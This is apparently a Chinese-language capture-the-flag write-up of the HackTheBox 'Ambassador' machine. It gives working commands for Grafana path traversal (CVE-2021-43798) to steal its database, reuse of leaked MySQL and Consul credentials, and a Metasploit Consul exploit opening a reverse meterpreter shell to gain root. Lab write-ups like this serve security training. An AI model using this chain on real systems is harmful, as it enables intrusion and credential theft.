HackTheBox-Machines-Ambassador

靶机地址

https://app.hackthebox.com/machines/499

靶机ip: 10.10.11.183 攻击机ip: 10.10.16.4

信息收集

Nmap枚举端口

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap 10.10.11.183              
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 22:12 EST
Nmap scan report for 10.10.11.183
Host is up (0.54s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds

发现开启了22，80，3000，3306 利用**-sC -sV -p22,80,3000,3306**命令来获得端口的具体内容

nmap -sC -sV -p22,80,3000,3306 10.10.11.183

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
|   256 80:a4:c5:2e:9a:b1:ec:da:27:64:39:a4:08:97:3b:ef (ECDSA)
|_  256 f5:90:ba:7d:ed:55:cb:70:07:f2:bb:c8:91:93:1b:f6 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
3000/tcp open  ppp?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Mon, 16 Jan 2023 05:57:44 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Mon, 16 Jan 2023 05:56:44 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Mon, 16 Jan 2023 05:56:56 GMT
|_    Content-Length: 0
3306/tcp open  mysql   MySQL 8.0.30-0ubuntu0.20.04.2
|_sslv2: ERROR: Script execution failed (use -d to debug)
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.30-0ubuntu0.20.04.2
|   Thread ID: 15
|   Capabilities flags: 65535
|   Some Capabilities: SupportsTransactions, SwitchToSSLAfterHandshake, IgnoreSigpipes, Speaks41ProtocolOld, Support41Auth, IgnoreSpaceBeforeParenthesis, ODBCClient, InteractiveClient, SupportsCompression, Speaks41ProtocolNew, SupportsLoadDataLocal, LongPassword, DontAllowDatabaseTableColumn, ConnectWithDatabase, LongColumnFlag, FoundRows, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: V>&^\x1B1OLJ\x02*2"Ejt79\i
|_  Auth Plugin Name: caching_sha2_password
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_8.0.28_Auto_Generated_Server_Certificate
| Not valid before: 2022-03-13T22:27:05
|_Not valid after:  2032-03-10T22:27:05
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.92%I=7%D=1/16%Time=63C4E71A%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Mon,\x2016\x20Jan\x202023\x2005:56
SF::44\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Mo
SF:n,\x2016\x20Jan\x202023\x2005:56:56\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Req
SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2
SF:0close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1
SF:\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset
SF:=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSess
SF:ionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(FourOhFourRequest,1A1,"HTTP/1\.0\x20302\x20Found\
SF:r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset
SF:=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\
SF:r\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\.txt
SF:%252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;
SF:\x20mode=block\r\nDate:\x20Mon,\x2016\x20Jan\x202023\x2005:57:44\x20GMT
SF:\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found</a>\.\n\n"
SF:);
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 235.72 seconds

知道80端口为http服务端口现在来进行访问 访问后是这样一个界面

页面下面有一段话 翻译一下大概意思是

没搞懂 下面来看看3000端口

3000端口打开是个登录框 发现Grafana v8.2.0 百度一波发现这个版本存在未授权任意文件读取漏洞 (CVE-2021-43798)

漏洞检测

检测弱口令未成功，未授权任意文件读取漏洞也没有利用成功

不知道怎么办了 先扫一下目录吧

看了一下没有什么东西，这次利用searchexploit查询grafana看能不能利用

searchsploit grafana
searchsploit -m multiple/webapps/50581.py
python 50581.py -H http://10.10.11.183:3000

可以利用 那读取一下他的全局配置文件

数据太乱了 先把他下载下来

curl --path-as-is http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db

利用sqlite3打开文件

使用以下命令使用收集的凭据登录托管在端口 3306 上的 MySQL 数据库

┌──(root㉿kali)-[/home/kali/Desktop]
└─# mysql -u grafana -p'dontStandSoCloseToMe63221!' -h 10.10.11.183 -P 3306
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 14
Server version: 8.0.30-0ubuntu0.20.04.2 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| grafana            |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| whackywidget       |
+--------------------+
6 rows in set (0.707 sec)

MySQL [(none)]> use whackywidget;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [whackywidget]> show tables;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users                  |
+------------------------+
1 row in set (0.568 sec)

MySQL [whackywidget]> select * from users;
+-----------+------------------------------------------+
| user      | pass                                     |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
1 row in set (0.435 sec)

MySQL [whackywidget]> 

好了 现在知道了密码 看他应该是base64加密 现在进行解密

账号: developer 密码: anEnglishManInNewYork027468

突然想到80端口那个提升说的就是这个吧

进行ssh连接

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh developer@10.10.11.183
developer@10.10.11.183's password: anEnglishManInNewYork027468
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 17 Jan 2023 09:08:06 AM UTC

  System load:           0.03
  Usage of /:            81.0% of 5.07GB
  Memory usage:          51%
  Swap usage:            0%
  Processes:             227
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.183
  IPv6 address for eth0: dead:beef::250:56ff:feb9:5d49


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Jan 17 07:09:24 2023 from 10.10.14.9
developer@ambassador:~$ 

提权

查看了**/opt 目录，发现了一个名为my-app的目录。在my-app目录中，有一个名为.git的目录。然后我使用以下命令深入研究git 日志。**

eveloper@ambassador:/opt$ cd my-app
developer@ambassador:/opt/my-app$ ls -la
total 24
drwxrwxr-x 5 root root 4096 Mar 13  2022 .
drwxr-xr-x 4 root root 4096 Sep  1 22:13 ..
drwxrwxr-x 4 root root 4096 Mar 13  2022 env
drwxrwxr-x 8 root root 4096 Mar 14  2022 .git
-rw-rw-r-- 1 root root 1838 Mar 13  2022 .gitignore
drwxrwxr-x 3 root root 4096 Mar 13  2022 whackywidget
developer@ambassador:/opt/my-app$ git log
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:47:36 2022 +0000

    tidy config script

commit c982db8eff6f10f8f3a7d802f79f2705e7a21b55
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:44:45 2022 +0000

    config script

commit 8dce6570187fd1dcfb127f51f147cd1ca8dc01c6
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 22:47:01 2022 +0000

    created project with django CLI

commit 4b8597b167b2fbf8ec35f992224e612bf28d9e51
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 22:44:11 2022 +0000

    .gitignore
developer@ambassador:/opt/my-app$ git show 33a53ef9a207976d5ceceddc41a199558843bf3c
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:47:36 2022 +0000

    tidy config script

diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index 35c08f6..fc51ec0 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
 # We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD before running
+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
 
-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
developer@ambassador:/opt/my-app$ 

发现了consul服务

发现存在远程命令执行漏洞并且MSF上就有

use exploit/multi/misc/consul_service_exec
options
set rhosts 10.10.11.183
set lhost 10.10.16.4 #改成自己的
set payload linux/x86/meterpreter/reverse_tcp
run

出现了报错 报错是说连接cosul API的时候出错了 查找资料后发现是因为没有8500端口 直接用SSL做一个本地端口转发 将靶机的8500端口转发到本地8500端口

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ssh -L 8500:0.0.0.0:8500  developer@10.10.11.183              
developer@10.10.11.183's password: anEnglishManInNewYork027468
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 17 Jan 2023 09:32:23 AM UTC

  System load:           0.01
  Usage of /:            81.0% of 5.07GB
  Memory usage:          52%
  Swap usage:            0%
  Processes:             229
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.183
  IPv6 address for eth0: dead:beef::250:56ff:feb9:5d49


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Jan 17 09:08:08 2023 from 10.10.16.4
developer@ambassador:~$ 

┌──(root㉿kali)-[/home/kali/Desktop]
└─# msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp; set rhosts 127.0.0.1; set lhost 10.10.16.4; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 4444; exploit" 

meterpreter > getuid
Server username: root
meterpreter > dir
Listing: /
==========

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040755/rwxr-xr-x  36864  dir   2022-09-27 10:49:17 -0400  bin
040755/rwxr-xr-x  4096   dir   2022-09-27 10:50:57 -0400  boot
040755/rwxr-xr-x  3980   dir   2023-01-17 00:26:36 -0500  dev
040755/rwxr-xr-x  4096   dir   2022-09-01 21:39:18 -0400  development-machine-documentation
040755/rwxr-xr-x  4096   dir   2022-09-27 10:49:35 -0400  etc
040755/rwxr-xr-x  4096   dir   2022-03-13 13:27:26 -0400  home
040755/rwxr-xr-x  4096   dir   2022-09-15 12:37:47 -0400  lib
040755/rwxr-xr-x  4096   dir   2022-02-23 03:49:52 -0500  lib32
040755/rwxr-xr-x  4096   dir   2022-09-15 12:37:22 -0400  lib64
040755/rwxr-xr-x  4096   dir   2022-02-23 03:49:52 -0500  libx32
040700/rwx------  16384  dir   2022-03-13 13:17:09 -0400  lost+found
040755/rwxr-xr-x  4096   dir   2022-03-13 22:53:24 -0400  media
040755/rwxr-xr-x  4096   dir   2022-02-23 03:50:00 -0500  mnt
040755/rwxr-xr-x  4096   dir   2022-09-01 18:13:17 -0400  opt
040555/r-xr-xr-x  0      dir   2023-01-17 00:26:25 -0500  proc
040700/rwx------  4096   dir   2022-09-14 13:13:20 -0400  root
040755/rwxr-xr-x  900    dir   2023-01-17 04:32:24 -0500  run
040755/rwxr-xr-x  20480  dir   2022-09-27 10:48:45 -0400  sbin
040755/rwxr-xr-x  4096   dir   2022-02-23 03:57:00 -0500  snap
040755/rwxr-xr-x  4096   dir   2022-02-23 03:50:00 -0500  srv
040555/r-xr-xr-x  0      dir   2023-01-17 00:26:26 -0500  sys
041777/rwxrwxrwx  4096   dir   2023-01-17 04:35:37 -0500  tmp
040755/rwxr-xr-x  4096   dir   2022-02-23 03:53:41 -0500  usr
040755/rwxr-xr-x  4096   dir   2022-03-13 15:32:52 -0400  var

meterpreter > cat /root/root.txt
bbdd0280d2e3af06211d91aadbc96740
meterpreter >